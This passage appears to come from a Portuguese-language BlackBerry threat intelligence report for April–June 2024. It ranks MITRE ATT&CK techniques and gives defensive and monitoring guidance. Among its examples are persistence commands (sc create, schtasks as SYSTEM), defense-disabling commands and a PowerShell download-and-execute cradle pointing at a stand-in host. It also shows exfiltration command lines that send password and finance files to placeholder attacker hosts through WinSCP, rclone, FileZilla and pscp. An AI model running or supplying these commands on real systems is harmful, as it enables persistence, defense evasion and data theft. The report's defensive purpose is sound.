Mascaramento
|
T1036
|
Evasão da defesa
|
6
|
↓
|
|
Protocolo da camada de aplicativos
|
T1071
|
Comando e controle
|
9
|
↓
|
|
Protocolo não relacionado à camada de aplicativos
|
T1095
|
Comando e controle
|
11
|
↓
|
|
Descoberta remota do sistema
|
T1018
|
Descoberta
|
12
|
↓
|
|
Execução do início automático de inicialização ou logon
|
T1547
|
Persistência, escalonamento de privilégios
|
NA
|
↑
|
|
Chaves de execução do registro / pasta de inicialização
|
T1547.001
|
Persistência, escalonamento de privilégios
|
10
|
↓
|
|
Descoberta da janela do aplicativo
|
T1010
|
Descoberta
|
13
|
↓
|
|
Impair Defesas
|
T1562
|
Evasão da defesa
|
NA
|
↑
|
|
Desativar ou modificar ferramentas
|
T1562.001
|
Evasão da defesa
|
17
|
↓
|
|
Tarefa agendada/trabalho
|
T1053
|
Execução, persistência, escalonamento de privilégios
|
15
|
↓
|
|
Dados do sistema local
|
T1005
|
Coleção
|
NA
|
↑
|
| ID da técnica | |
|---|---|
| Fluxo de execução do Hijack |
T1574
|
| Carregamento lateral de DLL |
T1574.002
|
| Injeção de processo |
T1055
|
| Captura de entrada |
T1056
|
| Descoberta de informações do sistema |
T1082
|
| Descoberta de software |
T1518
|
| Descoberta de software de segurança |
T1518.001
|
| Descoberta de processos |
T1057
|
| Descoberta de arquivos e diretórios |
T1083
|
| Mascaramento |
T1036
|
| Protocolo da camada de aplicativos |
T1071
|
| Protocolo não relacionado à camada de aplicativos |
T1095
|
| Descoberta remota do sistema |
T1018
|
| Execução do início automático de inicialização ou logon |
T1547
|
| Chaves de execução do registro / pasta de inicialização |
T1547.001
|
| Descoberta da janela do aplicativo |
T1010
|
| Impair Defesas |
T1562
|
| Desativar ou modificar ferramentas |
T1562.001
|
| Tarefa agendada/trabalho |
T1053
|
| Dados do sistema local |
T1005
|
| Nome da tática | |
|---|---|
| Fluxo de execução do Hijack |
Persistência, escalonamento de privilégios, evasão de defesa
|
| Carregamento lateral de DLL |
Persistência, escalonamento de privilégios, evasão de defesa
|
| Injeção de processo |
Escalonamento de privilégios, evasão de defesa
|
| Captura de entrada |
Acesso a credenciais, coleta
|
| Descoberta de informações do sistema |
Descoberta
|
| Descoberta de software |
Descoberta
|
| Descoberta de software de segurança |
Descoberta
|
| Descoberta de processos |
Descoberta
|
| Descoberta de arquivos e diretórios |
Descoberta
|
| Mascaramento |
Evasão da defesa
|
| Protocolo da camada de aplicativos |
Comando e controle
|
| Protocolo não relacionado à camada de aplicativos |
Comando e controle
|
| Descoberta remota do sistema |
Descoberta
|
| Execução do início automático de inicialização ou logon |
Persistência, escalonamento de privilégios
|
| Chaves de execução do registro / pasta de inicialização |
Persistência, escalonamento de privilégios
|
| Descoberta da janela do aplicativo |
Descoberta
|
| Impair Defesas |
Evasão da defesa
|
| Desativar ou modificar ferramentas |
Evasão da defesa
|
| Tarefa agendada/trabalho |
Execução, persistência, escalonamento de privilégios
|
| Dados do sistema local |
Coleção
|
| Último relatório | |
|---|---|
| Fluxo de execução do Hijack |
NA
|
| Carregamento lateral de DLL |
3
|
| Injeção de processo |
1
|
| Captura de entrada |
4
|
| Descoberta de informações do sistema |
2
|
| Descoberta de software |
NA
|
| Descoberta de software de segurança |
5
|
| Descoberta de processos |
8
|
| Descoberta de arquivos e diretórios |
7
|
| Mascaramento |
6
|
| Protocolo da camada de aplicativos |
9
|
| Protocolo não relacionado à camada de aplicativos |
11
|
| Descoberta remota do sistema |
12
|
| Execução do início automático de inicialização ou logon |
NA
|
| Chaves de execução do registro / pasta de inicialização |
10
|
| Descoberta da janela do aplicativo |
13
|
| Impair Defesas |
NA
|
| Desativar ou modificar ferramentas |
17
|
| Tarefa agendada/trabalho |
15
|
| Dados do sistema local |
NA
|
| Mudança | |
|---|---|
| Fluxo de execução do Hijack |
↑
|
| Carregamento lateral de DLL |
↑
|
| Injeção de processo |
↓
|
| Captura de entrada |
=
|
| Descoberta de informações do sistema |
↓
|
| Descoberta de software |
↑
|
| Descoberta de software de segurança |
↓
|
| Descoberta de processos |
↓
|
| Descoberta de arquivos e diretórios |
↓
|
| Mascaramento |
↓
|
| Protocolo da camada de aplicativos |
↓
|
| Protocolo não relacionado à camada de aplicativos |
↓
|
| Descoberta remota do sistema |
↓
|
| Execução do início automático de inicialização ou logon |
↑
|
| Chaves de execução do registro / pasta de inicialização |
↓
|
| Descoberta da janela do aplicativo |
↓
|
| Impair Defesas |
↑
|
| Desativar ou modificar ferramentas |
↓
|
| Tarefa agendada/trabalho |
↓
|
| Dados do sistema local |
↑
|
Usando o MITRE D3FEND™, a Equipe de Pesquisa e Inteligência sobre Ameaças do BlackBerry desenvolveu uma lista completa de contramedidas para as técnicas observadas durante esse período de relatório, que está disponível em nosso GitHub público. Os adversários usam as três técnicas mais conhecidas para coletar informações importantes para realizar ataques bem-sucedidos. Na seção Contramedidas aplicadas, discutimos alguns exemplos de seu uso e informações úteis para monitorar. A classificação do impacto do total de técnicas e táticas pode ser vista nesta figura.
Táticas detectadas
Neste período do relatório, há duas táticas com a mesma porcentagem de observações, Escalonamento de Privilégios e Evasão de Defesa, com 23%, seguida por Descoberta, com 19%. Essas são as mesmas táticas principais do período anterior.
-
Contramedidas aplicadas
A equipe de pesquisa e inteligência do site BlackBerry analisou cinco das técnicas MITRE mais observadas:
-
Fluxo de execução do sequestro - T1574
Hijack Execution Flow (T1574) é uma técnica sofisticada empregada por adversários para interceptar e manipular o fluxo de execução normal de um sistema, permitindo que eles executem códigos maliciosos em seu lugar. Esse método foi considerado muito predominante no último trimestre, demonstrando sua popularidade devido à sua eficácia em obter persistência e executar ações não autorizadas.
Há várias rotas para aproveitar os métodos dessa técnica, incluindo o sequestro da ordem de pesquisa da DLL, o carregamento lateral da DLL e a injeção de código mal-intencionado em processos legítimos. Ao sequestrar o fluxo de execução, os invasores podem obter controle sobre o sistema sem acionar alertas de segurança padrão. Isso torna difícil para as ferramentas de segurança detectar e impedir atividades futuras do agente da ameaça. Por exemplo, ao colocar uma DLL mal-intencionada em um local que é pesquisado antes da DLL legítima, o invasor pode garantir que seu código seja executado quando um aplicativo legítimo carregar a DLL.
Uma vantagem significativa dessa técnica para os adversários é sua capacidade de contornar as medidas de segurança. Como o código mal-intencionado é executado no contexto de um processo confiável, ele pode escapar dos mecanismos de segurança tradicionais que dependem da análise do comportamento do processo. Esse recurso torna o Hijack Execution Flow particularmente perigoso, pois pode ser usado para realizar uma ampla gama de atividades mal-intencionadas, desde o aumento de privilégios até a exfiltração de dados.
Para se defender contra o T1574, as organizações devem implementar medidas de segurança abrangentes, incluindo listas brancas de aplicativos, gerenciamento rigoroso de patches e monitoramento contínuo das atividades do sistema e da rede. A atualização regular do software e a garantia de que somente aplicativos autorizados possam ser executados reduzem significativamente o risco de sequestro do fluxo de execução.
O treinamento de conscientização do usuário também desempenha um papel fundamental para ajudar os funcionários a reconhecer os sinais de possíveis tentativas de sequestro de fluxo de execução, contribuindo para uma postura de segurança robusta. Por fim, o emprego de soluções avançadas de detecção de ameaças que possam identificar padrões de comportamento anormais associados a essa técnica é fundamental para a detecção e a resposta em tempo hábil. Alguns exemplos de uso do T1574 incluem:
- Sequestro de ordem de pesquisa de DLL: Um exemplo comum é a exploração da ordem de pesquisa de DLL no Windows. Se um invasor colocar um msvcrt.dll mal-intencionado no diretório de trabalho do aplicativo, ele poderá ser carregado pelo aplicativo em vez da versão legítima do diretório do sistema.
- Carregamento lateral de DLL: Em 2018, o grupo APT OceanLotus usou o carregamento lateral de DLL com o executável legítimo do Microsoft Word para carregar uma DLL mal-intencionada que estabeleceu persistência e executou outras cargas úteis.
- Sequestro de COM: Um invasor registra um objeto COM mal-intencionado em uma chave de registro específica que um aplicativo legítimo consulta com frequência. Quando o aplicativo chama o objeto COM, o código malicioso é executado em vez do objeto COM pretendido.
- Windows AppInit_DLLs: Ao modificar as chaves de registro, como AppInit_DLLs, um invasor garante que sua DLL mal-intencionada seja carregada em todos os processos aplicáveis, concedendo-lhe controle sobre esses processos.
- Injeção em processos legítimos: Um caso conhecido dessa técnica envolve o uso de injeção reflexiva de DLL pela ferramenta Cobalt Strike, em que a carga útil é injetada em um processo legítimo para evitar a detecção pelo software de segurança.
-
Execução do início automático de inicialização ou de logon - T1547
Na técnica Boot or Logon Autostart Execution (T1547), um invasor primeiro garante que o malware seja executado automaticamente durante a inicialização do sistema ou o login do usuário. Em seguida, o invasor usa mecanismos como chaves de registro, pastas de inicialização, tarefas agendadas ou registros de serviços para manter a persistência ou obter privilégios elevados no sistema comprometido. Esses mecanismos são projetados para facilitar a funcionalidade legítima do software e as tarefas de gerenciamento do sistema no sistema operacional. No entanto, os adversários podem abusar dessas funções para incorporar seu código malicioso, ajudando-o a se misturar às operações normais do sistema. Compreender e proteger esses mecanismos críticos do sistema operacional é essencial para a proteção contra a persistência não autorizada e o aumento de privilégios.
Aqui está um exemplo de um local de chave de registro frequentemente usado para estabelecer a persistência:
'HKLM\Software\Microsoft\Windows\CurrentVersion\Run ' - Esse é o registro do Windows usado para configurar programas a serem executados automaticamente quando o sistema operacional é iniciado.
Um exemplo de uma pasta de inicialização usada para estabelecer a persistência é:
'%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup ' - Esse caminho leva à pasta Startup, onde são colocados atalhos para programas que devem ser iniciados automaticamente quando o usuário faz logon.
A seguir, um exemplo de como a criação de serviços pode ser aproveitada para a persistência:
'sc create Updater binPath= "C:\Windows\malicious[.]exe" start= auto ' - O comando utiliza o utilitário de serviço para criar um serviço chamado "Updater" que é configurado para iniciar automaticamente na inicialização do sistema.
Outro exemplo de estabelecimento de persistência e obtenção de privilégios elevados é por meio do Agendador de Tarefas do Windows:
'schtasks /create /tn "Updater" /tr "C:\Windows\malicious[.]exe" /sc onlogon /ru SYSTEM ' - O comando cria uma tarefa agendada denominada "Updater" que executa o executável malicious.exe no local especificado sempre que um usuário faz logon, com a tarefa específica sendo executada na conta SYSTEM para privilégios elevados.
-
Impair Defenses - T1562
A técnica Impair Defenses (T1562) do MITRE, sob a tática Defense Evasion (TA0005), foi reconhecida como uma das cinco técnicas mais comuns usadas pelos adversários no período do relatório. Essa técnica altera elementos do ambiente da vítima para dificultar ou desativar os mecanismos de defesa. Os adversários não apenas prejudicam as defesas preventivas, como firewalls e software antivírus (AV), mas também interrompem os recursos de detecção que os defensores usam para auditar a atividade e identificar comportamentos mal-intencionados.
Quando os agentes de ameaças prejudicam com sucesso as defesas da vítima, eles ganham a liberdade de atacar sem serem detectados. Isso permite que eles injetem binários mal-intencionados, que podem ser usados para explorar outras técnicas do MITRE, como keyloggers, worms, cavalos de Troia e shells da Web mal-intencionados. Tudo isso pode fazer com que o ransomware seja executado em uma máquina.
É fundamental empregar medidas de proteção contra a técnica T1562 do MITRE para proteger seu sistema contra esses ataques. Essa técnica é frequentemente usada no início de um ataque, o que torna essencial detectá-la e neutralizá-la o mais cedo possível.
Abaixo está uma lista de linhas de comando que são úteis para monitorar:
- sc stop <ServiceName>
- sc config <ServiceName> start=disabled
- net stop <ServiceName>
- taskkill /IM <ToolName> /F
- netsh advfirewall set allprofiles state off
- bcdedit.exe /deletevalue {default} safeboot
- bcdedit /set {default} recoveryenabled no
-
Descoberta da janela do aplicativo - T1010
A técnica Application Window Discovery (T1010), sob a tática Discovery (TA0007), foi identificada pelos especialistas do BlackBerry como uma das principais técnicas usadas pelos agentes de ameaças cibernéticas nesse período do relatório. Essa técnica envolve a listagem de aplicativos abertos do Windows, fornecendo aos agentes de ameaças informações úteis sobre os padrões de uso do sistema de destino. Essas informações podem ser valiosas para identificar dados específicos que valem a pena ser coletados, bem como o software de segurança que os atacantes devem burlar para evitar a detecção. Os agentes de ameaças usam essa técnica para entender melhor o ambiente e planejar seu ataque para ser o mais agressivo possível sem ser detectado.
Para obter primeiro a lista de aplicativos abertos do Windows, os invasores normalmente exploram os recursos internos do sistema. Por exemplo, eles podem utilizar comandos do Command and Scripting Interpreter ou funções da API nativa para coletar as informações necessárias. Essas ferramentas e funções nativas são usadas com frequência porque têm menos probabilidade de causar suspeitas e podem oferecer informações abrangentes sobre o sistema.
Como esses comportamentos são suspeitos e podem fornecer a um adversário informações significativas sobre o sistema da vítima, é importante ter uma configuração de software de segurança capaz de detectar esses comandos ou ações executados por adversários.
Abaixo está uma lista de linhas de comando que podem ser úteis para monitorar:
- gps | where {$_.mainwindowtitle}
- Get-Process | Where-Object MainWindowTitle
- "cscript.exe", "rundll32.exe", "explorer.exe", "wscript.exe", "PowerShell.exe", "pwsh.dll", "winlogon.exe", "cmd.exe" são os processos principais para o uso dessas APIs: "user32.dll!GetWindowTextA", "user32.dll!GetForegroundWindow", "user32.dll!GetActiveWindow", "user32.dll!GetWindowTextW"
- lista de tarefas e lista de tarefas /v
-
Descoberta de software - T1518
A estrutura do MITRE ATT&CK identifica a Descoberta de Software (T1518) como uma técnica-chave na tática de Descoberta (TA0007). Esse método é frequentemente usado pelos adversários para obter informações sobre o ambiente de software dos sistemas visados, o que o torna uma etapa essencial em muitos ataques cibernéticos. A descoberta de software permite que os invasores identifiquem vulnerabilidades ao determinar quais aplicativos e versões estão instalados em um sistema. Essas informações ajudam os adversários a explorar softwares desatualizados ou sem patches, planejar maneiras de desativar ou evitar medidas de segurança e adaptar seus ataques para obter o máximo de eficácia.
Os métodos comuns de descoberta de software incluem o uso do Windows Management Instrumentation (WMI) com comandos como wmic "product" get name, version, vendor e scripts do PowerShell, como Get-ItemProperty ou Get-WmiObject. Esses métodos permitem que os invasores obtenham informações detalhadas sobre o software, consultem o registro do Windows e identifiquem os processos em execução e os aplicativos associados. As implicações de uma descoberta de software bem-sucedida são significativas. Os invasores podem explorar as vulnerabilidades de software identificadas para aumentar os privilégios ou executar códigos arbitrários. Eles também podem desativar ou contornar as defesas de segurança, aumentando a probabilidade de operar sem serem detectados. Além disso, ao compreender o ambiente de software, os adversários podem implantar malware direcionado especificamente aos aplicativos descobertos, aumentando a eficácia e a discrição de seus ataques.
Para se proteger contra essa técnica, as organizações devem implementar mecanismos robustos de monitoramento e alerta. É essencial monitorar o uso de comandos e scripts comumente associados à descoberta de software. O emprego de sistemas avançados de detecção de ameaças que usam análise comportamental pode ajudar a detectar atividades incomuns. Garantir que todos os softwares estejam atualizados e corrigidos, limitar o uso de ferramentas administrativas ao pessoal autorizado e manter registros abrangentes da execução de comandos também são etapas cruciais.
CylanceMDR Dados
Esta seção do relatório destaca as principais detecções de ameaças interessantes observadas em CylanceMDR ambientes de clientes que foram alvo de uma ameaça durante o período do relatório.
CylanceMDR é um serviço de detecção e resposta gerenciada (MDR) baseado em assinatura que oferece monitoramento 24 horas por dia, 7 dias por semana. Ele ajuda as organizações a impedir ameaças cibernéticas sofisticadas que buscam lacunas nos programas de segurança do cliente. A equipe do BlackBerry MDR rastreou milhares de alertas durante o período do relatório. Abaixo, detalhamos a telemetria região por região para fornecer mais informações sobre o cenário atual de ameaças.
CylanceMDR Observações
Durante o período do relatório, de forma semelhante ao último relatório, a equipe do CylanceMDR observou que a Certutil continuou sendo uma grande fonte de detecção para o centro de operações de segurança (SOC) em todas as regiões.
Nas regiões da América do Norte/América Latina (NALA) e EMEA, também notamos uma tendência de atividade relacionada às detecções de "Download do PowerShell". Por exemplo, vimos adversários tentando obter a técnica MITRE Ingress Tool Transfer (T1105) usando berços de download via PowerShell, como powershell.exe -noexit -ep bypass -command IEX((New-Object System.Net.WebClient).DownloadString('hxxps://SourceofEvil/test[.]ps1')).
Além disso, observamos um aumento nas detecções de codificação Base64, que não era tão predominante nas descobertas de nosso relatório anterior. A codificação Base64 oferece uma maneira relativamente fácil para um agente de ameaças ofuscar o código, disfarçando o código malicioso e, possivelmente, tornando-o menos detectável. No entanto, a maioria dos analistas experientes está bem ciente do uso do Base64 pelos agentes de ameaças, portanto, recursos extras de vigilância e detecção são geralmente incorporados aos SOCs mais maduros para identificar essa técnica de evasão.
De interesse especial na região NALA e APAC, começamos a observar mais algumas detecções relacionadas ao "Possível abuso do Msiexec via carregamento de DLL" neste período do relatório. Msiexec é um utilitário de linha de comando no Windows que é comumente associado à execução de pacotes de instalação .msi. Nosso sistema detecta agentes de ameaças que tentam abusar do Msiexec para executar proxy de uma carga útil de DLL maliciosa (técnica MITRE T1218.007). Um exemplo de comando visto é: 'C:\windows\system32\msiexec.exe /Z c:\programdata\evil.dll'.
Atividade LOLBAS
Durante o período do relatório, observamos a seguinte atividade de binários, scripts e bibliotecas living-off-the-land (LOLBAS):
- O Bitsadmin continua sendo o LOLBAS mais observado.
- A Certutil está em segundo lugar e aumentou desde o último período do relatório.
- Regsvr32, MSHTA e MOFCOMP ainda estão sendo observados, mas em geral representam uma baixa porcentagem.
Ferramentas de exfiltração
Em nosso relatório anterior, discutimos as ferramentas de monitoramento e gerenciamento remotos (RMM) e como elas são frequentemente abusadas por agentes de ameaças. As ferramentas de RMM proporcionam uma maneira fácil de um invasor manter a persistência e a facilidade de acesso, além de proporcionar uma maneira de exfiltrar facilmente os dados dos ambientes dos clientes. De fato, os pesquisadores relataram que as ferramentas de RMM são a categoria de crescimento mais rápido para os grupos de ransomware extraírem dados dos ambientes das vítimas.
Continuando com o tópico de exfiltração, durante o período do relatório, o CylanceMDR analisou as ferramentas mais comuns que poderiam ser usadas para exfiltração (sem incluir as ferramentas de RMM) nos ambientes de nossos clientes.
Ferramentas
WinSCP
Descrição: O WinSCP é um cliente de transferência de arquivos; o PuTTY é um cliente de shell seguro (SSH).
Exemplo de linha de comando: winscp.exe scp://test: P@ss123[at]EvilHost[.]com:2222/ /upload passwords.txt /defaults=auto
Observação: comumente usado com uma interface gráfica do usuário (GUI)
MITRE ATT&CK ID: T1048
Rclone
Descrição: O Rclone é um utilitário de linha de comando usado para gerenciar conteúdo no armazenamento em nuvem (ou seja, permitindo a transferência de arquivos na nuvem)
Exemplo de linha de comando: rclone.exe copy "\\SERVER\passwords\ ftp:EvilCorp\files" -q --transfers 10
MITRE ATT&CK ID: S1040
FileZilla
Descrição: O FileZilla é uma ferramenta conhecida de protocolo de transferência de arquivos (FTP) que pode ser usada em vários sistemas operacionais.
Exemplo de linha de comando: filezilla.exe -u "ftp://test:p@ss1234[at]ftp.test[.]com" -e "put passwords.txt /remote_directory/pass.txt"
MITRE ATT&CK ID: T1071.002
PSCP
Descrição: O PuTTY Secure Copy Protocol (PSCP) é um utilitário de linha de comando usado para transferir arquivos e pastas.
Exemplo de linha de comando: pscp.exe -P 22 C:\Finances.txt root[at]EvilDomain/tmp
MITRE ATT&CK ID: T1021.004
FreeFileSync
Descrição: O FreeFileSync é uma ferramenta de sincronização que pode ser usada para gerenciar backups.
Exemplo de linha de comando: FreeFileSync.exe google_drive_sync.ffs_batch
Note: The batch file will contain information regarding the file/folder and the location of the GDrive folder e.g., <Left Path=“C:\sensitiveFiles” /> <Right Path=“D:\GoogleDriveFolder” />
MITRE ATT&CK ID: T1567.002
Principais conclusões
A lista de ferramentas acima não é exaustiva, pois há muitas variações de ferramentas usadas para fins de exfiltração. Portanto, é importante que as organizações tenham uma estratégia de defesa contra o uso de ferramentas que possam ser usadas para fins maliciosos.
Essas estratégias podem incluir:
- Ferramentas de prevenção contra perda de dados (DLP) para detectar e evitar a perda, o uso indevido ou o compartilhamento de dados confidenciais por meio de uma violação, uso não autorizado ou exfiltração.
- Criptografia em repouso e em trânsito.
- Controles de acesso.
- Configurações de "privilégio mínimo". Forneça acesso somente ao que for necessário.
- Auditoria regular de contas - por exemplo, se um usuário mudar de função, ele poderá ter acesso a dados dos quais não precisa mais.
- Segmentação da rede, pois, em uma violação, segmentos de rede bem definidos impedirão o movimento lateral e reduzirão a superfície de ataque.
- Sistemas de detecção de intrusão para monitorar o tráfego da rede.
- Aplicar a abordagem padrão de negação - habilitar somente quando necessário. Por exemplo:
- Bloqueio do uso de portas USB ou serviços de armazenamento em nuvem. (Por exemplo, usar objetos de política de grupo (GPO) para desativar a transferência de dados em portas USB).
- As portas não devem ser expostas publicamente à Internet (ou seja, a porta 22 (SSH) não deve ser aberta para a Internet).
- Reduzir o risco geral limitando o uso de portas, protocolos e serviços.
- Monitoramento de padrões de tráfego de saída, como:
- Aumento do tráfego fora do horário normal de operação (desvio da linha de base normal).
- Um aumento repentino do tráfego de saída pela porta 22 pode indicar exfiltração usando uma ferramenta como o pscp.exe.
- Conforme mencionado acima, portas como a 22 devem aplicar uma abordagem de negação padrão para evitar esses riscos.
- Colocação de controles para monitorar tentativas de saída em portas ou serviços que tenham sido desativados.
- Por exemplo, se um agente de ameaças obtiver acesso a uma rede e tentar habilitar essas portas ou serviços para uso, esses controles alertarão a equipe de segurança.
Do ponto de vista de um analista de SOC, aqui estão alguns exemplos do que os analistas devem estar cientes:
Renomeação de ferramentas
Os analistas precisam estar cientes das ferramentas de exfiltração comumente usadas e de suas opções e parâmetros. Usando o exemplo do Rclone - 'rclone.exe copy "\\SERVER\passwords\ ftp:EvilCorp\files" -q --transfers 10 ' - um agente de ameaças pode renomear isso para algo mais inócuo, como - 'svchost.exe copy "\\SERVER\passwords\ ftp:EvilCorp\files" -q --transfers 10'.
Volume de transferência de dados
Se houver uma grande transferência de dados ou um aumento repentino no tráfego de saída, os analistas devem investigar, especialmente se a transferência ocorrer fora do horário comercial.
Tráfego anômalo
Desconfie de um padrão inesperado de transferências de dados de IPs ou hosts desconhecidos.
Análise do comportamento do usuário
Observe os padrões que se desviam da norma, como um usuário que acessa arquivos que normalmente não precisaria acessar. Um exemplo seria o host de um membro da equipe de marketing acessando registros financeiros de clientes.
Conclusão e previsões
Este relatório de 90 dias, que abrange de abril a junho de 2024, foi elaborado para ajudá-lo a se manter informado e preparado para ameaças futuras. Grupos criminosos de alto nível, especialmente operadores de ransomware, estão explorando novas vulnerabilidades e encontrando valor em alvos grandes e pequenos. Conforme observado no relatório, os pesquisadores do BlackBerry observaram uma média de mais de 11.500 hashes de malware exclusivos capturados diariamente. Esse nível de atividade torna crucial manter-se atualizado com as últimas notícias sobre segurança para seu setor e região.
Considerando o estado atual das ameaças cibernéticas, prevemos as seguintes ameaças nos próximos meses:
Interferência eleitoral
Globalmente, 2024 é um ano importante para as eleições, pois espera-se que cerca de 60% da população mundial vote. Já foram observadas tentativas de desinformação, desinformação e interferência ao longo do ano, incluindo ameaças por meio do meio relativamente novo de deepfakes. Os agentes mal-intencionados estão tentando cada vez mais aproveitar o momento para semear confusão, fomentar divisões sociais e causar interrupções. Prevemos que eles intensificarão suas campanhas para espalhar notícias falsas e desinformação, aumentando seus esforços à medida que cada eleição se aproxima.
Iscas de phishing com carga política
O abuso de postagens, fóruns e listas de discussão com conteúdo político para disseminar malware poderá em breve se tornar uma tática armada. Ao aproveitar as opiniões polarizadas de vários círculos políticos, os agentes de ameaças podem explorar esse caos para distribuir materiais políticos infectados com cavalos de Troia, implantando ainda mais malware. As táticas comuns incluem a criação de postagens em mídias sociais que semeiam desinformação e geram milhões de cliques, visualizações e engajamentos em plataformas de mídias sociais, mensageiros instantâneos e mídias tradicionais de notícias. Muitos agentes de ameaças podem usar essas atividades de mídia social como iscas para realizar ataques de malware.
A armamentização do caos
No âmbito da segurança cibernética, qualquer tipo de caos serve como um terreno fértil para que agentes mal-intencionados explorem a confusão e a desinformação. Seja durante guerras, desastres naturais, interrupções de TI ou qualquer interrupção significativa do fluxo normal de comunicações e dados, os períodos de instabilidade oferecem amplas oportunidades para os criminosos cibernéticos. Os agentes de ameaças estão preparados para aproveitar continuamente essas situações, disseminando e-mails falsos de phishing, publicações enganosas em fóruns e softwares mal-intencionados que se apresentam como ferramentas úteis e contextualmente relevantes.
Evolução do ransomware e IA
Diante do aumento do escrutínio das autoridades policiais, dos legisladores e dos profissionais de segurança em todo o mundo, os agentes de ameaças de ransomware provavelmente evoluirão suas táticas, técnicas e procedimentos (TTPs) para continuar suas operações.
Essa evolução pode envolver o aproveitamento da IA (especialmente a IA generativa) para desenvolver cargas úteis e cadeias de execução mais sofisticadas e blindadas, utilizando a tecnologia deepfake para ataques avançados e direcionados de engenharia social, descentralizando e tornando anônima a infraestrutura de rede e C2 para evitar o rastreamento e o desligamento, além de melhorar a segurança operacional.
Visite o blogBlackBerry para se manter atualizado com o cenário fluido de ameaças e defesas de segurança cibernética.
Agradecimentos
Este relatório representa os esforços de colaboração de nossas equipes e indivíduos talentosos. Em especial, gostaríamos de reconhecer:
- Adrian Chambers
- Alan McCarthy
- Alexandra Mozil
- Amalkanth Raveendran
- Anne-Carmen Ditter
- Daniel Corry
- Reitor Dado
- Geoff O'Rourke
- John de Boer
- Ismael Valenzuela Espejo
- Maristela Ames
- Natalia Ciapponi
- Natasha Rohner
- Ronald Welch
- Samual Rios
- Travis Hoxmeier
- William Johnson
Também gostaríamos de agradecer ao National Cybercrime Coordination Centre da Royal Canadian Mounted Police por sua contribuição e colaboração.
Mantenha-se no topo das ameaças cibernéticas
Registre-se agora